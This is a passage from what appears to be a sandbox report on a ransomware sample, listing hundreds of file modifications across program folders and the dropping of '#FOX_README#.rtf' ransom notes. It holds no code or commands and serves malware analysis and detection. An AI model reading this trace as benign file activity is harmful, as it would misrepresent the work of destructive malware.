opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.VisualElementsManifest.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\youtube.crx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\SplitTrace.vst f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\deploy\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\browser\features\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\84.0.4147.89_chrome_installer.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\te.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ReadConfirm.vbe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe 